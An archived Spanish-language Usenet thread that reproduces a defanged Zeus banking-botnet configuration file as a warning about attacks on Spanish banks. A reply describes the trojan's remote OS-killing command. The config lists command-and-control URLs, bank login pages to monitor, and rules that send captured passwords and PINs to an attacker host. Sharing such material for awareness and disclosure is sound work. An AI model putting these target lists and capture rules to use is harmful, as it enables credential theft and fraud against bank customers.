Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Siguiendo con/a Zeus

29 views
Skip to first unread message

c.b.

unread,
Nov 12, 2009, 3:49:30 AM11/12/09
to
Un "antiguo archivo de configuración de un botnet, preparado para el
asalto a entidades españolas (entre otras).

¿Cuanto dinero nos cuesta (recuperación de perdidas por medio del cobro
de comisiones bancarias) la existencia de esta red de salteadores, la
mayoría operando desde países occidentales?

Build time: 12:59:16 22 09 2009 GMT
Version: 1 2 8 1

entry "StaticConfig"
botnet "main"
timer_config 40 60
timer_logs 20 60
timer_stats 10 15
url_config "hxxp: lingobest info usse akelus psd"
url_compip "hxxp: prismonet com 11 22 22 11 ipcheck php" 20
encryption_key "2CuQ2rsZcf4"
blacklist_languages 1049
end

entry "DynamicConfig"
url_loader "hxxp: djkksdjfkkldjslkdfj com usse cgi_plugin exe"
url_server "hxxp: djkksdjfkkldjslkdfj com usse rss_feed php"
file_webinjects "webinjects txt"
entry "AdvancedConfigs"
"hxxp: inversiontrace ru indexlog23 vrt"
"hxxp: djkksdjfkkldjslkdfj com indexlog23 vrt"
"hxxp: dkles2jc cn indexlog23 vrt"
end

entry "WebFilters"
"@hxxps: acikdeniz denizbank com CustomLogin Retail aspx"
"@hxxps: www sparkasse at casserver login*"
"@hxxps: internetsube akbank com tr cgi-bin login_initial cgi?
ch=BIS*"
"@hxxps: *ipko pl*"
"@hxxps: servicash cajaextremadura es BEWeb 2099 3099
inicio_identificacion action"
"@hxxps: itaubankline itau com br GRIPNET bklcom dll"
"@hxxps: www bbva es DFAUTH slod DFServlet*"
"@hxxps: net24 montepio pt*"
"@hxxps: www cajamar es *"
"@hxxps: ww3 deutsche-bank es pbct *"
"@hxxps: enlinea cajasur es BEWeb 2024 4024
inicio_identificacion action*"
"@hxxps: seguro cam es camd SvlLoginCAM*"
"@hxxps: www barclays es publico contents *"
"@hxxps: cajaelectronica caja-granada es BEWeb 2031
2031 inicio_identificacion action*"
"@hxxps: www cajalaboral com home acceso asp"
"@hxxps: caixasabadell net banca2 tx0001 0001 jsp*"
"@hxxps: caionline cai es banca1 tx0001 0001 jsp*"
"@hxxps: www fibancmediolanum es *"
"@hxxps: www1 ibercajadirecto com *"
"@hxxps: caixadirecta cgd pt CaixaDirecta loginStart
do"
"@hxxps: www1 ibercajadirecto com*"
"@hxxps: www ceca es *"
"@hxxps: pccaja lacajadecanarias es banca4 tx0001
0001 jsp*"
"@hxxps: securenetbanking ca IBRetail *
"@hxxps: www sabadellatlantico com *"
"@hxxps: www bancoherrero com*"
"@hxxps: www solbank com*"
"@hxxps: banesnet banesto es*"
"@hxxps: oi cajamadrid es CajaMadrid *"
"@hxxps: activa24 ccm es BEWeb 2105 *"
"@hxxps: www unicaja es PortalServlet*"
"@hxxps: enova caixanova es BEWeb 2080 2080
inicio_identificacion action*"
"@hxxps: corporate bpn pt corporatebanking v10 PT
aspx empresas *"
"@hxxps: oficina24hores caixagirona es BEWeb*"
"@hxxps: www cajadeavila es cgi-bin *"
"@hxxps: be clavenet net BEWeb *"
"@hxxps: caonline credito-agricola pt *"
"@hxxps: zonasegura financiero com pe newhomebanking
Default Login aspx"
"@hxxps: vitalnet cajavital es BEWeb 2097 2097
inicio_identificacion action*"
"@hxxps: linea sanostra es BEWeb 2051 2051
login_identificacion action*"
"@hxxps: www cajabadajoz es cgi-bin INclient_6010*"
"@hxxps: ebanking millenniumbank gr eBankingWeb
Controller"
"@hxxps: ebanking eurobank gr eai EAIUserLoginWeb
login jsp*"
"@hxxps: www bancobest pt ptg start swe*"
"@hxxps: bes-sec bes pt wclientes axb tpl asp"
"@hxxps: www be grupobanif pt xsite_be BE home
Autenticacao jsp"
"@hxxps: www mbnet pt servlet *"
"@hxxps: telemarch bancamarch es htmlVersion *"
"@hxxps: portal bbk es servlet Satellite*"
"@hxxps: caionline cai es banca1 tx0001
TecladoVirtual jsp*"
"@hxxps: www empresas santandertoxxa pt
canalempresas finance login jsp*"
"@hxxps: www ebgempresa es niloinet login jsp*"
"@hxxps: www caixacatalunya es NASApp ceconline
flow jsp"
"@hxxps: www be grupobanif pt xsite_be BE home
Autenticacao jsp"
"@hxxps: factor2 inetbank net au factor2sc2 *"
"@hxxps: carnet cajarioja es banca3 tx0001
TecladoVirtual jsp*"
"@hxxps: ibbweb tecmarket it tmibbwebsecurity 05608
otherauth defaultPP aspx"
"@hxxps: zonasegura financiero com pe newhomebanking
Default Login aspx"
"@hxxps: caixagestionempresas caixagalicia es BEWeb
2091 *"
"@hxxps: rob raiffeisen it nibank MAIN*"
"@hxxps: www snsbank nl secure login scripts
LoginUsingDigipass asp*"
"@hxxps: www blbanking it imprpri wbOnetoone nvt
do banking WsTransfersActionManagerInsert do*"
"@hxxps: www bpmbanking it imprpri wbOnetoone nvt
do banking WsTransfersActionManagerInsert do*"
"@hxxps: banking ing-diba at*"
"@hxxps: banking raiffeisen at html servlet *"
"@hxxps: www pekaobiznes24 pl*"
"@hxxps: oie cajamadridempresas es CajaMadrid oie
pt_oie Login *"
"@hxxps: lacajaencasa cajacanarias es BEWeb 2065
3065 inicio_identificacion_portal action*"
"@hxxps: www caixaontinyent es cgi-bin
INclient_2045*"
"@hxxps: banking ing-diba de webkunden checkLogin
do*"
"@hxxps: bank1 netbanking ch cyberibis login
secondstep init jspa*"
"@hxxps: www bgnetplus es niloinet login jsp*"
"@hxxps: www mitnykredit dk ibank *"
"@hxxps: www caixatarragona es esp sec_1
oficinacodigo jsp*"
"@hxxps: www caixaontinyent es cgi-bin
INclient_2045*"
"@*portal bbk es*"
"@hxxps: telematic caixamanlleu es ISMC Manlleu_cat acceso jsp*"
end
entry "WebDataFilters"
"hxxps: *cajaespana net*" "notredirect"
"*caja-granada es*" "notredirect"
"hxxps: *barclays es*" "notredirect"
"hxxps: seguro cam es camd SvlLoginCAM*" "notredirect"
"hxxp*: *lacaixa es*" "notredirect"
"hxxps: *cajamar es*" "notredirect"
"hxxps: *caixacatalunya es*" "notredirect"
"*cajalaboral*" "notredirect"
"*bancae caixapenedes com*" "notredirect"
"hxxps: *deutsche-bank es*" "notredirect"
"hxxps: *uno-e com*" "notredirect"
"hxxps: *sanostra es *" "notredirect"
"hxxps: *sabadellatlantico com *" "notredirect"
"hxxps: *bvi bancodevalencia es *" "notredirect"
"hxxps: *bbvanetlatam com*" "notredirect"
"hxxps: *cajacirculo es *" "notredirect"
"hxxps: *bankpymenet com *" "notredirect"
"hxxps: *cajamurcia es *" "notredirect"
"hxxps: *cajasegovia es *" "notredirect"
"hxxps: *cajasur es*" "notredirect"
"hxxps: *ccm es*" "notredirect"
"hxxps: pccaja lacajadecanarias es *" "notredirect"
"hxxps: *bancocaixageral es *" "notredirect"
"hxxps: *iurisbank com isum Main*" "notredirect"
"hxxps: *bancoherrero com *" "notredirect"
"hxxps: *solbank com *" "notredirect"
"hxxps: *bancopastor es *" "notredirect"
"hxxps: *cajaduero es *" "notredirect"
"hxxps: *caixalaietana es*" "notredirect"
"hxxps: *cajastur es*" "notredirect"
"hxxps: *telematic caixamanlleu es*" "notredirect"
"hxxps: *ruralvia com isum Main*" "notredirect"

entry "WebFakes"
"hxxps: portal bbk es servlet jsp internet login realizarLogin
jsp" "hxxp: kpacotka info im bbk php" "P" "*notredirect=*"
"*password=*"
"hxxps: *cajaespana net*" "hxxp: kpacotka info im cjes php" "P"
"*notredirect=*" "*e_IdentificacionOB1_password=*"
"* caja-granada es*" "hxxp: kpacotka info im cjgranada php" "P"
"*notredirect=*" "*PIN=*"
"hxxps: *barclays es*" "hxxp: kpacotka info im bk php" "P"
"*notredirect=*" "*COORD_USER_VALUE=*"
"hxxps: * cajacirculo es *" "hxxp: kpacotka info im cajacirculo
php" "P" "*notredirect=*" "*sPassword=*"
"hxxps: * bankpymenet com *" "hxxp: kpacotka info im bankpymenet
php" "P" "*notredirect=*" "*password=*"
"hxxps: * cajamurcia es *" "hxxp: kpacotka info im cajamurcia
php" "P" "*notredirect=*" "*AUXPIN=*"
"hxxps: * cajasegovia es *" "hxxp: kpacotka info im cajasegovia
php" "P" "*notredirect=*" "*txtClave=*"
"hxxps: * bankinter com*" "hxxp: kpacotka info im bi php" "P" "*"
"*bkcache=*"
"hxxps: * bbva es*" "hxxp: kpacotka info im bb php" "P" "*"
"*eai_password=*"
"hxxps: *cajasur es*" "hxxp: kpacotka info im cajasur php" "P"
"*notredirect=*" "*PAN=*"
"hxxps: seguro cam es camd SvlLoginCAM*" "hxxp: kpacotka info
im cam php" "P" "*notredirect=*" "*userid=*"
"hxxps: *ccm es*" "hxxp: kpacotka info im ccm php" "P"
"*notredirect=*" "*PAN=*"
"hxxps: pccaja lacajadecanarias es *" "hxxp: kpacotka info im
lacan php" "P" "*notredirect=*" "*enviado=*idioma=*"
"hxxp*: *lacaixa es*" "hxxp: kpacotka info im lc php" "P"
"*notredirect=*" "*D=*"
"hxxps: *cajamar es*" "hxxp: kpacotka info im cj php" "P"
"*notredirect=*" "*NUME=*"
"hxxps: *caixacatalunya es*" "hxxp: kpacotka info im cat php" "P"
"*notredirect=*" "*PASSWORD=*"
"hxxps: *bancocaixageral es *" "hxxp: kpacotka info im
bancocaixageral php" "P" "*notredirect=*" "*ACCESS_CODE=*"
"hxxps: *iurisbank com isum Main*" "hxxp: kpacotka info im
iurisbank php" "P" "*notredirect=*" "*USUARIO=*"
"hxxps: *bancoherrero com *" "hxxp: kpacotka info im
bancoherrero php" "P" "*notredirect=*" "*pin=*"
"hxxps: *solbank com *" "hxxp: kpacotka info im solbank php" "P"
"*notredirect=*" "*ASEA00=*"
"hxxps: *bancopastor es *" "hxxp: kpacotka info im pstr php" "P"
"*notredirect=*" "*usrID=*"
"hxxps: *cajaduero es *" "hxxp: kpacotka info im cajaduero php"
"P" "*notredirect=*" "*pin=*"
"hxxps: *caixalaietana es*" "hxxp: kpacotka info im caixalaietana
php" "P" "*notredirect=*" "*PIN=*"
"hxxps: * cajastur es*" "hxxp: kpacotka info im cajastur php" "P"
"*notredirect=*" "*PIN=*"
"* cajalaboral *" "hxxp: kpacotka info im cajalaboral php" "P"
"*notredirect=*" "*password=*"
"* bbvanetoffice com*" "hxxp: kpacotka info im bbvanetoffice php"
"P" "*" "*eai_password=*"
"* bbvanetcash com*" "hxxp: kpacotka info im bbvanetcash php" "P"
"*" "*password=*"
"*bancae caixapenedes com*" "hxxp: kpacotka info im cxped php" "P"
"*notredirect=*" "*pass=*"
"hxxps: * deutsche-bank es*" "hxxp: kpacotka info im db php" "P"
"*notredirect=*" "*userNif raw=*"
"hxxps: *uno-e com*" "hxxp: kpacotka info im uno php" "P"
"*notredirect=*" "*eai_password=*"
"hxxps: *bvi bancodevalencia es *" "hxxp: kpacotka info im val
php" "P" "*notredirect=*" "*j_password=*"
"hxxps: * sanostra es *" "hxxp: kpacotka info im san php" "P"
"*notredirect=*" "*PIN=*"
"hxxps: * sabadellatlantico com *" "hxxp: kpacotka info im
sabadell php" "P" "*notredirect=*" "*pin=*"
"hxxps: * ruralvia com isum Main*" "hxxp: kpacotka info im rur
php" "P" "*notredirect=*" "*USUARIO=*"
"hxxps: *telematic caixamanlleu es*" "hxxp: kpacotka info im
caixamanlleu php" "P" "*notredirect=*" "*sPassword=*"
"hxxps: * bbvanetlatam com*" "hxxp: kpacotka info im bbvanetlatam
php" "P" "*notredirect=*" "*eai_password=*"


entry "dnsmap"

Best regards
c.b.

noSign

unread,
Nov 13, 2009, 2:14:36 PM11/13/09
to
La banca segura...


http://www.abuse.ch/wp-content/zeus_kill_os_command1.jpg

Es el comando remoto (kos) para inutilizar el SO con un bonito pantallazo
azul

Se utiliza una vez conseguidos los objetivos, para tener tiempo y ejecutar
las acciones ilegales en los bancos,
incluso para borrar rastros.

Los troyanos son InfoStealer, Zeus/Zbot y Nethell/Ambler


saludos
noSign


"c.b." <simequier...@despammed.com> escribi� en el mensaje
news:hdgi6p$fum$1...@news.eternal-september.org...
> Un "antiguo archivo de configuraci�n de un botnet, preparado para el
> asalto a entidades espa�olas (entre otras).
>
> �Cuanto dinero nos cuesta (recuperaci�n de perdidas por medio del cobro


> de comisiones bancarias) la existencia de esta red de salteadores, la

> mayor�a operando desde pa�ses occidentales?

0 new messages